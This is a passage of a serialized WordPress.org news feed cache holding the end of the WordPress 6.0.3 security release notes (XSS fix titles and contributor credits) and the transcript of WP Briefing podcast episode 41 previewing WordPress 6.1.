team</li>\n\n\n\n<li>Feature Image Block: XSS issue &#8211; Third-party security audit</li>\n\n\n\n<li>RSS Block: Stored XSS issue &#8211; Third-party security audit</li>\n\n\n\n<li>Fix widget block XSS &#8211; Third-party security audit</li>\n</ul>\n\n\n\n<h2>Thank you to these WordPress contributors</h2>\n\n\n\n<p>This release was led by <a href=\"https://profiles.wordpress.org/xknown\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/audrasjb\">Jb Audras</a>, and <a href=\"https://profiles.wordpress.org/SergeyBiryukov\">Sergey Biryukov</a> at mission control. Thanks to <a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/jorgefilipecosta/\">Jorge Costa</a>, <a href=\"https://profiles.wordpress.org/bernhard-reiter/\">Bernie Reiter</a> and <a href=\"https://profiles.wordpress.org/cbravobernal/\">Carlos Bravo</a> for their help on package updates.</p>\n\n\n\n<p>WordPress 6.0.3 would not have been possible without the contributions of the following people. Their asynchronous coordination to deliver several fixes into a stable release is a testament to the power and capability of the WordPress community.</p>\n\n\n\n<p class=\"is-style-default\"><a href=\"https://profiles.wordpress.org/xknown/\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/costdev/\">Colin Stewart</a>, <a href=\"https://profiles.wordpress.org/talldanwp/\">Daniel Richards</a>, <a href=\"https://profiles.wordpress.org/davidbaumwald/\">David Baumwald</a>, <a href=\"https://profiles.wordpress.org/dd32/\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/ehtis/\">ehtis</a>, <a href=\"https://profiles.wordpress.org/voldemortensen/\">Garth Mortensen</a>, <a href=\"https://profiles.wordpress.org/audrasjb/\">Jb Audras</a>, <a href=\"https://profiles.wordpress.org/johnbillion/\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/johnjamesjacoby/\">John James Jacoby</a>, <a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/jorgefilipecosta/\">Jorge Costa</a>, <a href=\"https://profiles.wordpress.org/jrf/\">Juliette Reinders Folmer</a>, <a href=\"https://profiles.wordpress.org/rudlinkon/\">Linkon Miyan</a>, <a href=\"https://profiles.wordpress.org/martinkrcho/\">martin.krcho</a>, <a href=\"https://profiles.wordpress.org/matveb/\">Matias Ventura</a>, <a href=\"https://profiles.wordpress.org/mukesh27/\">Mukesh Panchal</a>, <a href=\"https://profiles.wordpress.org/paulkevan/\">Paul Kevan</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/noisysocks/\">Robert Anderson</a><a href=\"https://profiles.wordpress.org/robinwpdeveloper/\">Robin</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/sumitbagthariya16/\">Sumit Bagthariya</a>, <a href=\"https://profiles.wordpress.org/tykoted/\">Teddy Patriarca</a>, <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>, <a href=\"https://profiles.wordpress.org/vortfu/\">vortfu</a>, and <a href=\"https://profiles.wordpress.org/chesio/\">Česlav Przywara</a>.</p>\n\n\n\n<p class=\"has-text-align-right has-small-font-size\"><em>Thanks to <a href=\'https://profiles.wordpress.org/peterwilsoncc/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>peterwilsoncc</a> for proofreading.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13618\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WP Briefing: Episode 41: WordPress 6.1 Sneak Peek with Special Guest Nick Diego\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"https://wordpress.org/news/2022/10/episode-41-wordpress-6-1-sneak-peek-with-special-guest-nick-diego/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 17 Oct 2022 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13578\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:112:\"Tune into episode 41 of the WordPress Briefing Podcast for a sneak peek into the upcoming WordPress 6.1 release.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2022/10/WP-Briefing-041.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:24900:\"\n<p>In the forty-first episode of the WordPress Briefing, peek into the upcoming WordPress 6.1 release with our host, Josepha Haden Chomphosy, and the release&#8217;s Editor Triage Lead, Nick Diego. </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/javiarce/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/javiarce/\">Javier Arce</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a><br>Song: Fearless First by Kevin MacLeod </p>\n\n\n\n<h2>Guests</h2>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/ndiego/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/ndiego/\">Nick Diego</a></p>\n\n\n\n<h2>References</h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/mobile/2022/10/04/call-for-testing-wordpress-for-android-20-9/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/mobile/2022/10/04/call-for-testing-wordpress-for-android-20-9/\">Call for Testing for WordPress for Android 20.9</a><br><a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-2-now-available/\" data-type=\"URL\" data-id=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-2-now-available/\">RC2 WordPress 6.1</a> <br><a href=\"https://make.wordpress.org/core/2022/10/10/multisite-improvements-in-wordpress-6-1/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/core/2022/10/10/multisite-improvements-in-wordpress-6-1/\">Multisite Improvements</a><br><a href=\"https://make.wordpress.org/core/2022/10/10/block-styles-generation-style-engine/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/core/2022/10/10/block-styles-generation-style-engine/\">Block Style Generation Tool</a><br><a href=\"https://make.wordpress.org/core/2022/10/10/changes-to-block-editor-preferences-in-wordpress-6-1/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/core/2022/10/10/changes-to-block-editor-preferences-in-wordpress-6-1/\">Editor Preferences Changes</a><br><a href=\"https://make.wordpress.org/core/2022/09/14/6-1-product-walk-through-recap/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/core/2022/09/14/6-1-product-walk-through-recap/\">WordPress 6.1 Walkthrough </a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13578\"></span>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:00]&nbsp;</strong></p>\n\n\n\n<p>Hello everyone. And welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks.</p>\n\n\n\n<p>I&#8217;m your host, Josepha Haden Chomphosy. Here we go.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:40]&nbsp;</strong></p>\n\n\n\n<p>And today I have with me Nick Diego. Welcome, Nick, to the WordPress Briefing.</p>\n\n\n\n<p><strong>[Nick Diego 00:00:44]&nbsp;</strong></p>\n\n\n\n<p>Thank you so much for having me.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:46]&nbsp;</strong></p>\n\n\n\n<p>Yeah. Before we get started, why don&#8217;t you tell me a bit about yourself, just kind of your history with WordPress and then what it is that you&#8217;ve been doing with the WordPress 6.1 release squad.</p>\n\n\n\n<p><strong>[Nick Diego 00:00:56]</strong></p>\n\n\n\n<p>Yeah, so I&#8217;m actually kind of new to working with WordPress full-time. Up until about June of last year, I was in the hospitality industry for a career of 10 years. But I always loved doing WordPress on the side. And after the long pandemic, I figured it was time to kind of pursue my passion and work with WordPress full-time.</p>\n\n\n\n<p>And that ultimately led to my current role as a developer advocate at WPEngine, where I focus primarily on WordPress and contribution to Core itself. And then I guess it was maybe March or April this year when <a href=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a>, who I&#8217;ve worked with a ton, she asked me if I&#8217;d be interested in helping out on 6.0 as an Editor Triage Lead which was an awesome experience.</p>\n\n\n\n<p>And now I&#8217;m back for 6.1.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:01:37]&nbsp;</strong></p>\n\n\n\n<p>That&#8217;s excellent. I always like to hear about people who are coming to do repeat tours of duty.</p>\n\n\n\n<p><strong>[Nick Diego 00:01:43]</strong></p>\n\n\n\n<p>Yes, exactly.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:01:44]&nbsp;</strong></p>\n\n\n\n<p>I probably shouldn&#8217;t refer to working on WordPress releases as a tour of duty. However, I find that releases are so large and complex, and there are so many people in there now that working on them takes an entirely different skill set now than it used to take when WordPress was like 1% of the web.</p>\n\n\n\n<p>And so I think it&#8217;s a really big task, and I think it&#8217;s great when people were, like, that was either so good that I would do it again, or I would like a second go because I could do it better. Whichever way brings people to it. So, yeah.</p>\n\n\n\n<p><strong>[Nick Diego 00:02:18]&nbsp;</strong></p>\n\n\n\n<p>No, I was just gonna say that&#8217;s a great point because the Editor Triage Lead, which is the role that I currently have, was a brand new role for 6.0. The project kind of got so big that it kind of made sense to have a triage lead focused specifically on Gutenberg. Gutenberg&#8217;s such a big part of WordPress now.</p>\n\n\n\n<p>And so that&#8217;s where that role kind of came from, and now we&#8217;ve carried it over to 6.1. As the project grows, we need more people to come in and help make sure the release is as smooth as it can be.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:02:42]</strong></p>\n\n\n\n<p>Yes. Because of that promise of backward compatibility and all the things.</p>\n\n\n\n<p><strong>[Nick Diego 00:02:47]</strong></p>\n\n\n\n<p>Exactly.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:02:48]&nbsp;</strong></p>\n\n\n\n<p>Cool. So, by the time this releases, if I recall correctly, we will have passed RC2, or RC2 is coming the next day or something like that. We&#8217;re right around the Release Candidate two. So you have been doing this for quite some time on this particular release. So far, what is the feature that you&#8217;re most excited about that&#8217;s going out in the 6.1 release?</p>\n\n\n\n<p><strong>[Nick Diego 00:03:09]&nbsp;</strong></p>\n\n\n\n<p>So, this is going to sound really boring, but it&#8217;s actually incredibly exciting. So, the most exciting quote-unquote feature that I&#8217;m excited about is the improved consistency and standardization of block controls that are coming in 6.1. So things like typography and color and borders and dimensions.</p>\n\n\n\n<p>These are things and tools that we&#8217;ve had in a lot of core blocks, but it hasn&#8217;t been consistent throughout. And a ton of work has been done in 6.1 to establish that consistency. We&#8217;re not a hundred percent there, but typography, I think we&#8217;re at like 85% of all core blocks now support all the typography controls, and with each release as we head to 6.2, we&#8217;ll improve on that.</p>\n\n\n\n<p>But it&#8217;s really great for theme builders, theme designers, and users to be able to control the look and feel blocks consistently throughout the editor.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:03:58]&nbsp;</strong></p>\n\n\n\n<p>I was gonna immediately answer you earlier with like, there are no boring answers, there are no boring improvements. And as you were explaining why it is that you kind of thought it might be considered boring, I think it&#8217;s fair to say that anytime that you&#8217;re increasing the consistency and you&#8217;re increasing the confidence between what you saw on the back end and what you actually shipped on the front end– anytime you&#8217;re doing that, I think that that is exciting in the prove the negative way.&nbsp;</p>\n\n\n\n<p>If you think about the negative excitement that occurs when you have published something, and it looks one way in the back end, and then it looks totally different on the front end, and the panic you feel when you have to fix. Not having that is a really big step up, I think. And so anything that provides more consistency for people who are using WordPress, people who are building with WordPress, I always find exciting. But also, like, I&#8217;m an office person, and so I would find office things exciting, right?</p>\n\n\n\n<p><strong>[Nick Diego 00:04:53]&nbsp;</strong></p>\n\n\n\n<p>It creates a more delightful experience. I do a lot of work on the Training team, doing educational things, and we teach people how to change typography and change color. Once they learn how to do it in one block, if they can take that same skill set and apply it to any other block, it&#8217;s that light bulb moment. They understand they know how to manipulate and use WordPress to its fullest. So adding that consistency really helps to level up users.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:05:15]&nbsp;</strong></p>\n\n\n\n<p>Yeah, I&#8217;m gonna take us off track a little bit and just ask a general question here. Like, I remember the first time that I was working with what was a site, I guess, qualified for a site at the time. And I remember the first time that I discovered that I could change the look and feel with HTML and CSS, and I did that.</p>\n\n\n\n<p>Also was like, well, I accept my fate. Whatever happens, if I kill everything I&#8217;ve ever written, that is just how it&#8217;ll be. Like the sheer terror of all of that is so different now. Do you recall that first moment where you&#8217;re like, Oh, I do have some power over this? I have some control over this, and whether you also found it scary.</p>\n\n\n\n<p><strong>[Nick Diego 00:05:52]</strong></p>\n\n\n\n<p>So I came to WordPress kinda as a hobby and website development kind of as a hobby. So I was kind of always in that tinkering phase, or I wasn&#8217;t building something for anyone else. I was in a safe place to destroy whatever I was working on with my tinkering. So I never really quite had that fear, but I can definitely see it from the perspective of building something for somebody else.</p>\n\n\n\n<p>But you&#8217;re right, the editor and the controls that we have, and you know, now make it a lot easier to kind of manipulate and exert your creative desires in WordPress than it was before with CSS.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:06:23]&nbsp;</strong></p>\n\n\n\n<p>I love the phrase ‘I was safe to destroy things, ’ and if I can figure out a way to make it a tagline for something, I will.</p>\n\n\n\n<p><strong>[Nick Diego 00:06:30]&nbsp;</strong></p>\n\n\n\n<p>Exactly.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:06:31]&nbsp;</strong></p>\n\n\n\n<p>Alright. So during your second time around here on the release squad with 6.1, what have been the bright spots of that experience, and have there been any unexpected challenges of being on the release squad?</p>\n\n\n\n<p><strong>[Nick Diego 00:06:44]</strong></p>\n\n\n\n<p>Again, I come to WordPress from, you know, from a different career. It&#8217;s kind of a passion of mine to be working with WordPress. So I kinda have a unique experience than maybe some others. And when I approach WordPress, there&#8217;s always that tendency to say, ‘why doesn&#8217;t it do this?’ Or ‘why don&#8217;t they do this?’ And I&#8217;ve always been the person…, well, it&#8217;s open source. We, we, we can, we can</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:07:05]&nbsp;</strong></p>\n\n\n\n<p>…can do it</p>\n\n\n\n<p><strong>[Nick Diego 00:07:05]&nbsp;</strong></p>\n\n\n\n<p>…we can do it. And so that&#8217;s kind of how I approach things. Now, of course, you know, I have the privilege of time to do that. Not everybody does, but one of the unexpected bright spots about working in a release squad is understanding how it all works.&nbsp;</p>\n\n\n\n<p>How does WordPress actually get built? What is the process that it goes through? It was just eye-opening to me, and I really got a shout-out, Anne, for inviting me to be on 6.0. It brought me in. I learned so much about it, and now I&#8217;m just excited to keep working on these releases.</p>\n\n\n\n<p>But a release is hard. You know, it&#8217;s a… WordPress is huge. There are a lot of moving parts, there are a lot of things going on. Right now, we&#8217;re trying to get everything ready for the first release candidate. So being on the release squad is not an easy job. But it&#8217;s exciting, it&#8217;s fun, and you really feel like you&#8217;re part of that ‘we’ really helping to build WordPress.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:07:53]&nbsp;</strong></p>\n\n\n\n<p>One of the things that I hope that people have learned from any time that they spent working with me is that like we understand here in the WordPress open source project, and I believe that all open source projects must understand this, but like every change that you make, if there are things that are dependent on it, which is gonna be true for most of us, we&#8217;ll have intended consequences and also unexpected consequences, and unintended, unexpected consequences.&nbsp;</p>\n\n\n\n<p>And so I&#8217;ve always felt like the thing that really makes the biggest difference about how we do open source in WordPress is that, for the most part, we have a concept of where the most likely changes are going to happen across our entire ecosystem.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:08:40]&nbsp;</strong></p>\n\n\n\n<p>We have a better understanding, at least compared to when I got here, a better understanding of how interconnected it all is. And so you&#8217;ve got this change here, and it looks small, but it&#8217;s gonna have this positive or negative impact as you kind of work your way out from it. And so I think that that is an interesting thing, and certainly, you get a really clear concept of it in the release squad, I think.</p>\n\n\n\n<p><strong>[Nick Diego 00:09:02]</strong></p>\n\n\n\n<p>Oh, absolutely. If you were to build something like the block editor without caring at all about backward compatibility, you&#8217;d be done by now, right? I mean, so much of what we do is concerning ourselves with making sure that everybody who&#8217;s on a classic theme or hybrid theme or whatever it might be that they continue to use WordPress in a safe and stable way.</p>\n\n\n\n<p>This is part of being such a large content management system.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:09:24]&nbsp;</strong></p>\n\n\n\n<p>So you already told us the feature that you&#8217;re most excited about, and so now I&#8217;m gonna ask you about what feature or what bug fix has the most notable improvements that are coming to 6.1. This is a little different as in, like, there&#8217;s the thing you&#8217;re excited about, which is an office thing, but like a thing that is maybe not new but has the biggest delta, the biggest change to anyone&#8217;s experience of it.</p>\n\n\n\n<p><strong>[Nick Diego 00:09:51]&nbsp;</strong></p>\n\n\n\n<p>Yeah, so obviously, in 5.9, we introduced full site editing, and 6.0 was a natural progression from that with more and more features. Now it&#8217;s safe to say that there&#8217;s only a small fraction of websites that are using the whole full site editing of or block themes, all that kind of stuff. One of the hangups about that was managing templates inside of the site editor.</p>\n\n\n\n<p>You could add the files to your theme, which would then show up in the site editor. But there wasn&#8217;t a direct way to add more complicated templates within the site editor itself. That is changing in 6.1. So now you actually have the functionality to install something like 2023, which is the new core theme, and build out all these very complicated templates within the UI of the site editor that you could not have done before.</p>\n\n\n\n<p><strong>[Nick Diego 00:10:38]</strong>&nbsp;</p>\n\n\n\n<p>I personally think that the biggest benefit of full site editing is really to empower no-code or low-code users. And the ability to add these templates directly in the UI really levels them up. Because now, you can do all that complicated stuff that you normally would need to be adding to theme files and jumping into the code. You can do that within the site editor now, which I think is fantastic.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:10:59]&nbsp;</strong></p>\n\n\n\n<p>That&#8217;s great. And just a general caveat, anytime that we talk about anything that&#8217;s very developer-y or very no code-y, I think it&#8217;s always worth mentioning, yes, a lot of what we&#8217;re trying to do with the block editor is to just kind of give some power back to folks who cannot find the time to become a developer or don&#8217;t have the inclination. They don&#8217;t want to do that.&nbsp;</p>\n\n\n\n<p>But that does not mean that no code is ever involved in WordPress. It&#8217;s still a software. You can still do very complicated things with it. And if you are a developer, you should not think to yourself, ‘oh now that it&#8217;s being available to low code/no code users, that means you don&#8217;t want me.’</p>\n\n\n\n<p>Like, that&#8217;s not at all what&#8217;s happening. You can do very complicated things still.&nbsp;</p>\n\n\n\n<p><strong>[Nick Diego 00:11:42]&nbsp;</strong></p>\n\n\n\n<p>A hundred percent. A hundred percent. Absolutely.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:11:45]&nbsp;</strong></p>\n\n\n\n<p>Alright, so that brings us to our final question here because we like to stay as true to the name as possible here on the WP Briefing. If someone were wanting to get involved with the next release, so WP 6.2, how would they do that?</p>\n\n\n\n<p><strong>[Nick Diego 00:12:01]</strong></p>\n\n\n\n<p>So, talk to Anne, and she&#8217;ll get you set up. No, I&#8217;m just kidding. So at the, after each release, there&#8217;s a posting that goes out that lists all the different release teams, and you can just put your name out there and ask to be, you know, for consideration to be part of the team.</p>\n\n\n\n<p>However, I will say that the best thing you can do right now is help with 6.1. You don&#8217;t necessarily need to be a release lead to do that testing, helping with bug fixes. Reach out to me. Reach out to other release leads, and we&#8217;ll get you involved and engaged with the release. That will give you a really good framework to start working and become a release lead for 6.2.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:12:37]&nbsp;</strong></p>\n\n\n\n<p>Yeah. I think we talked maybe two or three episodes ago, or it could be more than that, I&#8217;ll never know, about the release squad, like the group that&#8217;s doing that. In the event you think to yourself, ‘there&#8217;s no way in a million years that I&#8217;m gonna just show up tomorrow and be part of the release squad,’ I heard what they said in the first question/answer moment– that&#8217;s fine, too.&nbsp;</p>\n\n\n\n<p>As Nick mentioned, you can always get involved with testing, you can get involved with triage. Those are areas where any feedback at all is valuable because we can get better information about what worked and didn&#8217;t, what was expected versus what happened. And that type of information is where all of our co-creators of the WordPress software–really, we rely on what you all are pointing out to us.&nbsp;</p>\n\n\n\n<p>If you&#8217;re not shining spotlights on the most painful parts of your experience, sometimes we don&#8217;t necessarily know that that&#8217;s a pain point for anyone.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:13:34]</strong>&nbsp;</p>\n\n\n\n<p>And so yeah, that&#8217;s a great place to start. If you are more of a writer, technical or prose, there are different spaces you can go to, like keep our docs up to date or make sure that people know that changes are coming at all in WordPress because that&#8217;s a thing. If you are a backend developer, we have a million things you can do because that&#8217;s just all day, every day, for WordPress.</p>\n\n\n\n<p>It&#8217;s just all the deep backend work. And so yeah.</p>\n\n\n\n<p><strong>[Nick Diego 00:13:58]&nbsp;</strong></p>\n\n\n\n<p>I did want to mention that, you know, being on the release team does not necessarily mean that you&#8217;re incredibly technical. We have a documentation lead, we have a design lead, you know, a communication lead. So there&#8217;s a lot of different roles in the team that, you know, across all disciplines.</p>\n\n\n\n<p>So don&#8217;t think if you&#8217;re not a hardcore developer, that precludes you from being on the team.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:14:19]&nbsp;</strong></p>\n\n\n\n<p>Yeah, and if you&#8217;re really good with common sense and working fully remotely, you can be the release coordinator. I can tell you because I did that for 5.0. It was a big job. It was our, it was the first time we had a release squad as opposed to just like the release lead.</p>\n\n\n\n<p>Because there was just so much that was going into that and so much riding on it. And like you said in some other answer that you gave like if you were to just be like, we&#8217;re shutting everything down and rewriting this in six months, and I hope you can come with us on it. Like a lot of open source projects do it that way.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:14:51]</strong>&nbsp;</p>\n\n\n\n<p>And that is a choice, and we made the opposite choice. And so we&#8217;re bringing all of our co-conspirators with us, all of our co-creators of WordPress. That&#8217;s the hope all the time. Making sure that they have enough information, that they feel safe to destroy things, enough information, and skills about how to get out of it, that they always feel some high confidence in what they&#8217;re trying to do versus what they actually did do.</p>\n\n\n\n<p>So, yeah, excellent. Nick, do you have any final thoughts for our listeners?</p>\n\n\n\n<p><strong>[Nick Diego 00:15:20]&nbsp;</strong></p>\n\n\n\n<p>Nope. I just hope everybody goes out and downloads 6.1 and enjoys it as much as I am.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:15:25]&nbsp;</strong></p>\n\n\n\n<p>Yeah, go check it out.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:15:28]&nbsp;</strong></p>\n\n\n\n<p>That brings us now to our small list of big things. And actually, it is a pretty big list today, but still pretty big things too. So first up, we have a call for testing that is out, and it is for our Android users.</p>\n\n\n\n<p>There is a call for testing for WordPress for Android 20.9, and I feel like we don&#8217;t get a lot of calls for testing for Android devices. And so if you have been feeling left out or just like we don&#8217;t always have that kind of mobile testing available, this is the opportunity for you.&nbsp;</p>\n\n\n\n<p>The next thing is that tomorrow, we have RC2, release candidate two for WordPress 6.1.</p>\n\n\n\n<p>That&#8217;s coming out on October 18th. There will be a link in the show notes, but that means if you write a plugin or a theme or have anything that kind of extends the core of WordPress, now is the time to start testing anything that might be a bug or represent a breaking change and make sure that you file those bugs so that we can get things as settled and excellent as possible.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:16:40]&nbsp;</strong></p>\n\n\n\n<p>And speaking of Word points, uh, WordPress 6.1, not Word point, WordPress 6.1. I actually have three changes that I think are going to represent some pretty big changes for folks. I will have links to all of these in the show notes. If you don&#8217;t know where the show notes are, it&#8217;s on wordpress.org/news/podcast.</p>\n\n\n\n<p>So the three things that I think are gonna be big, worthwhile things. The first one is multisite improvements, and the second one will be the style engine that&#8217;s block styles generation tool, which will ship in Core and I think is really important for y&#8217;all to take a look at. And then also there are some changes coming to the block editor preferences.<br><br>Like I said, links to all of those are going to be in the show notes, and so they should be pretty easy for you to find. But also, if you want to just get a general look at everything that&#8217;s coming in 6.1, we did a walkthrough that I will link to in the show notes as well, and you can get a full understanding of what is going to be coming early in November.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:17:45]&nbsp;</strong></p>\n\n\n\n<p>And that, my friends, is your small list –big list– of big things. Thanks for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13578\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"The Month in WordPress – September 2022\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wordpress.org/news/2022/10/the-month-in-wordpress-september-2022/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Oct 2022 10:07:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:18:\"month in 